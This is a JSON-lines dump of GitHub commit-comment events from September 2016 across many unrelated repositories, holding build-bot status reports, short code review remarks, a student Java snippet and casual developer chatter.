{"id":"4584435450","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19081650,"position":null,"line":null,"path":null,"commit_id":"4b1d08727250668b1de3f896b5332f2b9e3df1f4","created_at":"2016-09-19T16:46:41Z","updated_at":"2016-09-19T16:46:41Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4b1d08727250668b1de3f896b5332f2b9e3df1f4-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T16:46:41Z"}
{"id":"4584437858","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081653,"position":66,"line":66,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:47:04Z","updated_at":"2016-09-19T16:47:04Z","body":"OK...."}},"created_at":"2016-09-19T16:47:04Z"}
{"id":"4584438853","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/feng3d-ts"},"payload":{"comment":{"id":19081656,"position":null,"line":null,"path":null,"commit_id":"35d95fbdde8391c4bc463e65553e18f182211525","created_at":"2016-09-19T16:47:15Z","updated_at":"2016-09-19T16:47:15Z","body":"#15 "}},"created_at":"2016-09-19T16:47:15Z"}
{"id":"4584441593","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-city"},"payload":{"comment":{"id":19081658,"position":19,"line":19,"path":"Assignment Week 6/js/script.js","commit_id":"8a67f38a3e4b31d746091f90ec1c365d8154cca5","created_at":"2016-09-19T16:47:39Z","updated_at":"2016-09-19T16:47:39Z","body":"Great job using `$(this)`!"}},"created_at":"2016-09-19T16:47:39Z"}
{"id":"4584444728","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-city"},"payload":{"comment":{"id":19081660,"position":7,"line":7,"path":"Assignment Week 6/js/script.js","commit_id":"8a67f38a3e4b31d746091f90ec1c365d8154cca5","created_at":"2016-09-19T16:48:14Z","updated_at":"2016-09-19T16:48:14Z","body":"Excellent job pseudocoding and adding helpful logs."}},"created_at":"2016-09-19T16:48:14Z"}
{"id":"4584452974","type":"CommitCommentEvent","actor":{"login":"wardenfeng"},"repo":{"name":"wardenfeng/feng3d-ts"},"payload":{"comment":{"id":19081669,"position":null,"line":null,"path":null,"commit_id":"bdace7d0f73c3fdeee6b386573efdbd7b5f1d4ed","created_at":"2016-09-19T16:49:39Z","updated_at":"2016-09-19T16:49:39Z","body":"#15 使用 https://github.com/layabox/layaair/blob/master/samples/ts/2d/index.html为模板 制作示例框架"}},"created_at":"2016-09-19T16:49:39Z"}
{"id":"4584453378","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081670,"position":197,"line":197,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:49:44Z","updated_at":"2016-09-19T16:49:44Z","body":"OK..."}},"created_at":"2016-09-19T16:49:44Z"}
{"id":"4584453760","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19081672,"position":null,"line":null,"path":null,"commit_id":"7d06fd62dd20655961730cfe4f1ea83adf26061c","created_at":"2016-09-19T16:49:48Z","updated_at":"2016-09-19T16:49:48Z","body":"i just saw the message.\r\n\r\nYes i guess we can.i already rooted that shit and i am ready.although i dont want to spend time on note4 for now.\r\nWe got to give aosp7 and cm14 as JDCs"}},"created_at":"2016-09-19T16:49:48Z"}
{"id":"4584457023","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081678,"position":278,"line":278,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:50:24Z","updated_at":"2016-09-19T16:50:24Z","body":"OK..."}},"created_at":"2016-09-19T16:50:24Z"}
{"id":"4584457975","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081679,"position":308,"line":308,"path":"QuickSubmitForm.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:50:33Z","updated_at":"2016-09-19T16:50:33Z","body":"OK..."}},"created_at":"2016-09-19T16:50:33Z"}
{"id":"4584458403","type":"CommitCommentEvent","actor":{"login":"kurniaramadani"},"repo":{"name":"kurniaramadani/kurniaramadani.github.io"},"payload":{"comment":{"id":19081680,"position":null,"line":null,"path":null,"commit_id":"e30ddccf66c7f4964bbfac3478a90a27e82731e9","created_at":"2016-09-19T16:50:37Z","updated_at":"2016-09-19T16:50:37Z","body":"asd"}},"created_at":"2016-09-19T16:50:37Z"}
{"id":"4584462551","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-city"},"payload":{"comment":{"id":19081686,"position":null,"line":null,"path":null,"commit_id":"8a67f38a3e4b31d746091f90ec1c365d8154cca5","created_at":"2016-09-19T16:51:22Z","updated_at":"2016-09-19T16:51:22Z","body":"Your code looks excellent, Mary. I don't see anything here to improve on, the only thing I can suggest is doing more bonuses, but you've been doing most of them already! Feel free to reach out to us if you have any questions or would like additional challenges"}},"created_at":"2016-09-19T16:51:22Z"}
{"id":"4584462972","type":"CommitCommentEvent","actor":{"login":"ZhangBihui"},"repo":{"name":"ZhangBihui/GuoKe-"},"payload":{"comment":{"id":19081687,"position":null,"line":null,"path":null,"commit_id":"2b5a6f6219381443a2d9085c42390079ba0c3973","created_at":"2016-09-19T16:51:26Z","updated_at":"2016-09-19T16:51:26Z","body":"果壳高仿"}},"created_at":"2016-09-19T16:51:26Z"}
{"id":"4584467106","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081698,"position":66,"line":66,"path":"QuickSubmitPlugin.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:52:10Z","updated_at":"2016-09-19T16:52:10Z","body":"OK..."}},"created_at":"2016-09-19T16:52:10Z"}
{"id":"4584478040","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19081715,"position":81,"line":81,"path":"QuickSubmitPlugin.inc.php","commit_id":"d531fb482ccc12f04ff2cc0c89912366abaa597e","created_at":"2016-09-19T16:54:03Z","updated_at":"2016-09-19T16:54:03Z","body":"I use BlaBla, BluBlu and other staff like that :P. I prefer break points, but they help too!\r\n"}},"created_at":"2016-09-19T16:54:03Z"}
{"id":"4584478514","type":"CommitCommentEvent","actor":{"login":"nouiz"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":19081716,"position":22,"line":1399,"path":"theano/compile/profiling.py","commit_id":"b27f6a3fa333124186c780a98752052b63261e50","created_at":"2016-09-19T16:54:09Z","updated_at":"2016-09-19T16:54:09Z","body":"Did you ran the code? Just to make sure."}},"created_at":"2016-09-19T16:54:09Z"}
{"id":"4584483703","type":"CommitCommentEvent","actor":{"login":"kmova"},"repo":{"name":"cloudbytestorage/support-cli-utilities"},"payload":{"comment":{"id":19081721,"position":null,"line":null,"path":null,"commit_id":"3d86035f7a2367d836fce051ebe98b5da92df550","created_at":"2016-09-19T16:54:59Z","updated_at":"2016-09-19T16:54:59Z","body":"It will be good to have argument checks before proceeding with the next steps. "}},"created_at":"2016-09-19T16:54:59Z"}
{"id":"4584487943","type":"CommitCommentEvent","actor":{"login":"ssriera"},"repo":{"name":"ssriera/ember-gmail"},"payload":{"comment":{"id":19081726,"position":null,"line":null,"path":null,"commit_id":"5f69b6c8c5408448751c35e0d6368d2024a8e097","created_at":"2016-09-19T16:55:42Z","updated_at":"2016-09-19T16:55:42Z","body":"Not sure why I'm getting `http://localhost:4200/inbox/undefined` and not `http://localhost:4200/inbox/1`"}},"created_at":"2016-09-19T16:55:42Z"}
{"id":"4584488373","type":"CommitCommentEvent","actor":{"login":"numeprenume"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19081727,"position":null,"line":null,"path":null,"commit_id":"73238c17012621c463756f228f5c599d6b15321a","created_at":"2016-09-19T16:55:45Z","updated_at":"2016-09-19T16:55:45Z","body":"Doesn't seem to work. Setting it to 12 by default does work, though."}},"created_at":"2016-09-19T16:55:45Z"}
{"id":"4584488626","type":"CommitCommentEvent","actor":{"login":"davidaurelio"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19081728,"position":526,"line":526,"path":"packager/react-packager/src/node-haste/DependencyGraph/ResolutionRequest.js","commit_id":"667aaa4621a9f59b620cb17b39af8dd309ebd0da","created_at":"2016-09-19T16:55:46Z","updated_at":"2016-09-19T16:55:46Z","body":"if it starts with more than two dots,  it is a file or directory name."}},"created_at":"2016-09-19T16:55:46Z"}
{"id":"4584488909","type":"CommitCommentEvent","actor":{"login":"xueliangsun"},"repo":{"name":"xueliangsun/Dont_Starve_Together"},"payload":{"comment":{"id":19081729,"position":null,"line":null,"path":null,"commit_id":"faaa8ec3eea97eb10997011286720a715031d633","created_at":"2016-09-19T16:55:51Z","updated_at":"2016-09-19T16:55:51Z","body":"Survival Game\r\nPlayer1: WASD\r\nPlayer2: arrow keys"}},"created_at":"2016-09-19T16:55:51Z"}
{"id":"4584490420","type":"CommitCommentEvent","actor":{"login":"stel"},"repo":{"name":"bennyguitar/Colours"},"payload":{"comment":{"id":19081730,"position":null,"line":null,"path":null,"commit_id":"8fcd5be1c8f4f65fc6968263c54060661dbe0a7d","created_at":"2016-09-19T16:56:07Z","updated_at":"2016-09-19T16:56:07Z","body":"@ajgr can you share your tests? The reason for this check is that `-getHue:saturation:brightness:alpha:` works only with `RGB*` color spaces (according to the docs: https://developer.apple.com/reference/appkit/nscolor/1534060-gethue), that means that color should have 4 components."}},"created_at":"2016-09-19T16:56:07Z"}
{"id":"4584491729","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19081734,"position":null,"line":null,"path":null,"commit_id":"692c24648cbb7783ee422492decf765f664482a4","created_at":"2016-09-19T16:56:20Z","updated_at":"2016-09-19T16:56:20Z","body":"Cool that's better. \r\n\r\nBtw, I checked and Trello uses 3px so I'm not that crazy :)"}},"created_at":"2016-09-19T16:56:20Z"}
{"id":"4584492965","type":"CommitCommentEvent","actor":{"login":"MarcelRaad"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19081736,"position":null,"line":null,"path":null,"commit_id":"714daaf5706e9e2b196beb5446cc4f53d1652c75","created_at":"2016-09-19T16:56:31Z","updated_at":"2016-09-19T16:56:31Z","body":"Unfortunately this will break other libraries (for example some Boost libraries) which rely on clang defining `__GNUC__` in GCC mode if crypto++ headers are included before them."}},"created_at":"2016-09-19T16:56:31Z"}
{"id":"4584494703","type":"CommitCommentEvent","actor":{"login":"abayomiakinyemi"},"repo":{"name":"ellsworth24/ProgrammingAssignment2"},"payload":{"comment":{"id":19081737,"position":null,"line":null,"path":null,"commit_id":"f872e0ee24dcf0878625dccb2e3e7271dd2291e8","created_at":"2016-09-19T16:56:45Z","updated_at":"2016-09-19T16:56:45Z","body":"great"}},"created_at":"2016-09-19T16:56:45Z"}
{"id":"4584496068","type":"CommitCommentEvent","actor":{"login":"modocache"},"repo":{"name":"SwiftWeekly/swiftweekly.github.io"},"payload":{"comment":{"id":19081742,"position":35,"line":35,"path":"_drafts/2016-09-22-issue-39.md","commit_id":"8c37d258d3956022cc80c98b146ab9f73b22a3b5","created_at":"2016-09-19T16:56:57Z","updated_at":"2016-09-19T16:56:57Z","body":"Fixed in #90. Thanks!"}},"created_at":"2016-09-19T16:56:57Z"}
{"id":"4584505712","type":"CommitCommentEvent","actor":{"login":"Emmanuel-Armstrong"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19081755,"position":null,"line":null,"path":null,"commit_id":"024d51bb1952d97a540f962086f53fb257cdb741","created_at":"2016-09-19T16:58:24Z","updated_at":"2016-09-19T16:58:24Z","body":"Gocha yeah that makes sense I'll relook over that.  I also got the rest of\nthe methods in the client finished (I think) working on the server ones\nnow.  Cant test though because I'm getting a weird compile error and I cant\nfigure out what is actually wrong haha.  Its one of the ones where the\nerror message is not helpful so I'll figure that out too\n\nOn Mon, Sep 19, 2016 at 10:44 AM, tyler-sassaman <notifications@github.com>\nwrote:\n\n> We just need to make sure that we are using the HTTP message protocol that\n> we outlined in class. I also have the other documents completed that we\n> need to upload to the dropbox with this project...I will add them later\n> today(one of which includes the message protocol that we outlined in class).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/024d51bb1952d97a540f962086f53fb257cdb741#commitcomment-19081626>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANiCOX8r_jkVsmyaT8obCKLHuTdJQKwGks5qrrvtgaJpZM4KAtAa>\n> .\n>\n"}},"created_at":"2016-09-19T16:58:24Z"}
{"id":"4584517150","type":"CommitCommentEvent","actor":{"login":"edeyoung"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19081768,"position":null,"line":null,"path":null,"commit_id":"757907e74ccd74b6b89d4a9e7bf42db3922d7ab0","created_at":"2016-09-19T17:00:06Z","updated_at":"2016-09-19T17:00:06Z","body":"is this a fix for dogpark?"}},"created_at":"2016-09-19T17:00:06Z"}
{"id":"4584523668","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19081779,"position":null,"line":null,"path":null,"commit_id":"8adf77726df70c8226a8d402035a5255b63eee55","created_at":"2016-09-19T17:01:07Z","updated_at":"2016-09-19T17:01:07Z","body":"Yes I wonder, since I wasn't able to reproduce."}},"created_at":"2016-09-19T17:01:07Z"}
{"id":"4584525504","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19081781,"position":20,"line":20,"path":"docs/guide/Configs/Columns.md","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:01:22Z","updated_at":"2016-09-19T17:01:22Z","body":"I really like it!"}},"created_at":"2016-09-19T17:01:22Z"}
{"id":"4584525960","type":"CommitCommentEvent","actor":{"login":"diegogoding"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":19081783,"position":null,"line":null,"path":null,"commit_id":"99944a66a788678e3faad68ba4b48d244906aec6","created_at":"2016-09-19T17:01:26Z","updated_at":"2016-09-19T17:01:26Z","body":"Okay, cool. I see where I got confused. Thanks for clearing that up. "}},"created_at":"2016-09-19T17:01:26Z"}
{"id":"4584527916","type":"CommitCommentEvent","actor":{"login":"diegogoding"},"repo":{"name":"gandm/language-babel"},"payload":{"comment":{"id":19081789,"position":null,"line":null,"path":null,"commit_id":"99944a66a788678e3faad68ba4b48d244906aec6","created_at":"2016-09-19T17:01:44Z","updated_at":"2016-09-19T17:01:44Z","body":"Btw, I the package is great!\r\n"}},"created_at":"2016-09-19T17:01:44Z"}
{"id":"4584528500","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19081790,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T17:01:49Z","updated_at":"2016-09-19T17:01:49Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T17:01:49Z"}
{"id":"4584529915","type":"CommitCommentEvent","actor":{"login":"git8808"},"repo":{"name":"e2ebridge/xslt4node"},"payload":{"comment":{"id":19081794,"position":null,"line":null,"path":null,"commit_id":"e46190f7401f5b9479b45ad3337398737b6645f3","created_at":"2016-09-19T17:02:02Z","updated_at":"2016-09-19T17:02:02Z","body":"When I install xslt4node via npm, this change isn't applied. In package.json there is this `\"async\": \">=0.4.0\"` not this ` \"async\": \">=0.4.0 < 2.0.0\"`"}},"created_at":"2016-09-19T17:02:02Z"}
{"id":"4584531969","type":"CommitCommentEvent","actor":{"login":"sravanivas"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19081804,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T17:02:21Z","updated_at":"2016-09-19T17:02:21Z","body":" import java.util.*;\r\n public class Count\r\n {\r\n\tpublic int test(String str) \r\n\t{\r\n      int b = 0;\r\n      int count = 1;\r\n      if(str.length() == 0)\r\n\t  { \r\n         b = 0;\r\n      } \r\n\t  else if(str.length() == 1)\r\n\t  { \r\n         b = 1;\r\n      } \r\n\t  else \r\n\t  {\r\n\t\t  \r\n          for(int i=0; i < str.length()-1; i++)\r\n\t\t  {  \r\n\t\t\tif (str.charAt(i) == str.charAt(i+1))\r\n\t\t\t  {\r\n                 count = count + 1; \r\n                   if(count > b)\r\n\t\t\t\t   {\r\n                     b = count; \r\n                   }\r\n              }\r\n\t\t\t else count = 1; \r\n          }\r\n      }\r\n      return b;\r\n\t}  \r\n\tpublic static void main(String args[])\r\n\t{\r\n\t\tCount c=new Count();\r\n\t\tScanner sc=new Scanner(System.in);\r\n\t\tSystem.out.print(\"Enter the string:\");\r\n\t\tString s=sc.next();\r\n\t\tint x=c.test(s);\r\n\t\tSystem.out.println(x);\r\n\t}\r\n }"}},"created_at":"2016-09-19T17:02:21Z"}
{"id":"4584534254","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19081806,"position":null,"line":null,"path":null,"commit_id":"73238c17012621c463756f228f5c599d6b15321a","created_at":"2016-09-19T17:02:41Z","updated_at":"2016-09-19T17:02:41Z","body":"Nah, already expected that. I'll try another way. "}},"created_at":"2016-09-19T17:02:41Z"}
{"id":"4584536894","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19081809,"position":null,"line":null,"path":null,"commit_id":"47b5971bd47cbd98c6db0ec17908ee18e546fa11","created_at":"2016-09-19T17:03:07Z","updated_at":"2016-09-19T17:03:07Z","body":"Oops. Missed that one, because I only looked for link (makedepends) dependencies. Thank you!"}},"created_at":"2016-09-19T17:03:07Z"}
{"id":"4584539099","type":"CommitCommentEvent","actor":{"login":"mvougiou"},"repo":{"name":"mvougiou/DAQAggregator"},"payload":{"comment":{"id":19081810,"position":null,"line":null,"path":null,"commit_id":"14e9ed646e7f23823824ef4b0ff961b337ffe67a","created_at":"2016-09-19T17:03:27Z","updated_at":"2016-09-19T17:03:27Z","body":"Redundant commit"}},"created_at":"2016-09-19T17:03:27Z"}
{"id":"4584539105","type":"CommitCommentEvent","actor":{"login":"r-freak"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":19081811,"position":null,"line":null,"path":null,"commit_id":"a07375a0d698ccacf30169da5738e7cadc72644d","created_at":"2016-09-19T17:03:27Z","updated_at":"2016-09-19T17:03:27Z","body":"Added: \r\n- Ladies versus Butlers!\r\n- Nodame Cantabile\r\n- Nodame Cantabile Finale\r\n- Nodame Cantabile Paris Hen\r\n- Ookami Kakushi\r\n- So Ra No Wo To"}},"created_at":"2016-09-19T17:03:27Z"}
{"id":"4584540747","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19081816,"position":null,"line":null,"path":null,"commit_id":"28080cd72abffa1c1018afb049579d37e83b024e","created_at":"2016-09-19T17:03:41Z","updated_at":"2016-09-19T17:03:41Z","body":"Hmm result still looks the same to me. You?"}},"created_at":"2016-09-19T17:03:41Z"}
{"id":"4584547221","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19081826,"position":12,"line":12,"path":"docs/guide/Configs/Jobs.md","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:04:34Z","updated_at":"2016-09-19T17:04:34Z","body":"I don't like such short names. We use full names in most of the places and I believe that we should keep it that way"}},"created_at":"2016-09-19T17:04:34Z"}
{"id":"4584551608","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19081835,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:05:17Z","updated_at":"2016-09-19T17:05:17Z","body":"Fiz um teste aqui e o elemento ``<label>`` deve aparecer antes de ``<title>``. Me parece meio estranho usar assim.. "}},"created_at":"2016-09-19T17:05:17Z"}
{"id":"4584555973","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19081841,"position":39,"line":39,"path":"docs/guide/Configs/Jobs.md","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:05:56Z","updated_at":"2016-09-19T17:05:56Z","body":"really good name!"}},"created_at":"2016-09-19T17:05:56Z"}
{"id":"4584557132","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19081842,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:06:10Z","updated_at":"2016-09-19T17:06:10Z","body":"`Element ref-list content does not follow the DTD, expecting (label? , title? , (address | alternatives | array | boxed-text | chem-struct-wrap | fig | fig-group | graphic | media | preformat | supplementary-material | table-wrap | table-wrap-group | disp-formula | disp-formula-group | def-list | list | tex-math | mml:math | p | related-article | related-object | disp-quote | speech | statement | verse-group)* , ref* , ref-list*), got (title label ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref ref)`"}},"created_at":"2016-09-19T17:06:10Z"}
{"id":"4584557599","type":"CommitCommentEvent","actor":{"login":"holmesie"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19081845,"position":null,"line":null,"path":null,"commit_id":"757907e74ccd74b6b89d4a9e7bf42db3922d7ab0","created_at":"2016-09-19T17:06:14Z","updated_at":"2016-09-19T17:06:14Z","body":"Yes"}},"created_at":"2016-09-19T17:06:14Z"}
{"id":"4584561150","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19081850,"position":null,"line":null,"path":null,"commit_id":"0408085d74158e00515ec539143eee3c47365ce2","created_at":"2016-09-19T17:06:47Z","updated_at":"2016-09-19T17:06:47Z","body":"@nanosoldier runbenchmarks(ALL, vs = \"dab390ccd2e8d57e7450d72b1c51286530340ae7\")"}},"created_at":"2016-09-19T17:06:47Z"}
{"id":"4584563670","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19081856,"position":54,"line":54,"path":"docs/guide/Configs/Jobs.md","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:07:11Z","updated_at":"2016-09-19T17:07:11Z","body":"another cool feature!"}},"created_at":"2016-09-19T17:07:11Z"}
{"id":"4584568435","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19081862,"position":57,"line":57,"path":"docs/guide/Configs/Jobs.md","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:07:54Z","updated_at":"2016-09-19T17:07:54Z","body":"another short name"}},"created_at":"2016-09-19T17:07:54Z"}
{"id":"4584573308","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19081869,"position":null,"line":null,"path":null,"commit_id":"b599ee4679aacafb581fb1aa624ff9175f57952b","created_at":"2016-09-19T17:08:39Z","updated_at":"2016-09-19T17:08:39Z","body":"not sure that it's related to this particular commit, but it seems that something was broken recently, e.g. https://travis-ci.org/nadako/hxjsonast/jobs/161091266#L1691\r\n\r\n```\r\ninclude/StringTools.h:27:36: error: extra qualification ‘StringTools_obj::’ on member ‘__new’ [-fpermissive]\r\n   hx::ObjectPtr< StringTools_obj > StringTools_obj::__new() {\r\n```"}},"created_at":"2016-09-19T17:08:39Z"}
{"id":"4584574658","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19081871,"position":null,"line":null,"path":null,"commit_id":"f30c9499b62e4959d8265b1e22401702f073aa15","created_at":"2016-09-19T17:08:49Z","updated_at":"2016-09-19T17:08:49Z","body":"@nanosoldier `runbenchmarks(ALL, vs=\"e781d08180a96519e84793e872c96e095df95c79\")`"}},"created_at":"2016-09-19T17:08:49Z"}
{"id":"4584576297","type":"CommitCommentEvent","actor":{"login":"zwang1225"},"repo":{"name":"zwang1225/zwang1225.github.io"},"payload":{"comment":{"id":19081876,"position":null,"line":null,"path":null,"commit_id":"3d0152dac27b4b0fd7b498bc36407347463534a3","created_at":"2016-09-19T17:09:06Z","updated_at":"2016-09-19T17:09:06Z","body":"hello world\r\n"}},"created_at":"2016-09-19T17:09:06Z"}
{"id":"4584586618","type":"CommitCommentEvent","actor":{"login":"n054"},"repo":{"name":"n054/fetch"},"payload":{"comment":{"id":19081889,"position":null,"line":null,"path":null,"commit_id":"1f1ac2790e32e67b94c2a583dc37be03a38ce70d","created_at":"2016-09-19T17:10:42Z","updated_at":"2016-09-19T17:10:42Z","body":"48b814a1453f774a8b2d8a8a6129b540ecab41ee"}},"created_at":"2016-09-19T17:10:42Z"}
{"id":"4584590076","type":"CommitCommentEvent","actor":{"login":"wsilva32"},"repo":{"name":"3drobotics/ardupilot-solo"},"payload":{"comment":{"id":19081897,"position":26,"line":208,"path":"libraries/AP_Motors/AP_MotorsMatrix.cpp","commit_id":"3348d492cf172951547ad6b2da382bbb771c42d1","created_at":"2016-09-19T17:11:16Z","updated_at":"2016-09-19T17:11:16Z","body":"For the `min` part, shouldn't it be comparing with the difference of `_hover_out - _min_throttle' and not just `_hover_out`?"}},"created_at":"2016-09-19T17:11:16Z"}
{"id":"4584590614","type":"CommitCommentEvent","actor":{"login":"wsilva32"},"repo":{"name":"3drobotics/ardupilot-solo"},"payload":{"comment":{"id":19081898,"position":26,"line":208,"path":"libraries/AP_Motors/AP_MotorsMatrix.cpp","commit_id":"3348d492cf172951547ad6b2da382bbb771c42d1","created_at":"2016-09-19T17:11:21Z","updated_at":"2016-09-19T17:11:21Z","body":"@priseborough ^"}},"created_at":"2016-09-19T17:11:21Z"}
{"id":"4584594587","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19081903,"position":null,"line":null,"path":null,"commit_id":"45eabb9d21469733137a3c01abe7f23243816701","created_at":"2016-09-19T17:11:57Z","updated_at":"2016-09-19T17:11:57Z","body":"At line 221 in material.cpp Values are divided by 16...\r\n`e->value = int16_t((imbalance<WHITE>(PieceCount) - imbalance<BLACK>(PieceCount)) / 16);`\r\n\r\n\r\nSo you are giving 40/16 = 3 less to one side if he has the bishop pair in the ending\r\nMoreover, this 3 is like a S(0, 3)\r\nThis is...a drop in the evaluation ocean.\r\n\r\nSome changes by +- S(0, 4) might have an impact if they are cumulated on many pieces or pawn.\r\nBut here, it is just a one-time change,\r\n\r\nTo see any difference, you would need to try at least 1687 +/- 160  or more.\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-19T17:11:57Z"}
{"id":"4584597660","type":"CommitCommentEvent","actor":{"login":"symbianflo"},"repo":{"name":"kokoko3k/higgins"},"payload":{"comment":{"id":19081908,"position":null,"line":null,"path":null,"commit_id":"7914be25a1e8a764dc16189eb233b3c3cf477c9e","created_at":"2016-09-19T17:12:28Z","updated_at":"2016-09-19T17:12:28Z","body":"GenericName=Versatile application launcher    SUCKS\r\nGenericName=krunner alternative                     GOOOOOOOOOOOD\r\n\r\n\r\npensaci su ...."}},"created_at":"2016-09-19T17:12:28Z"}
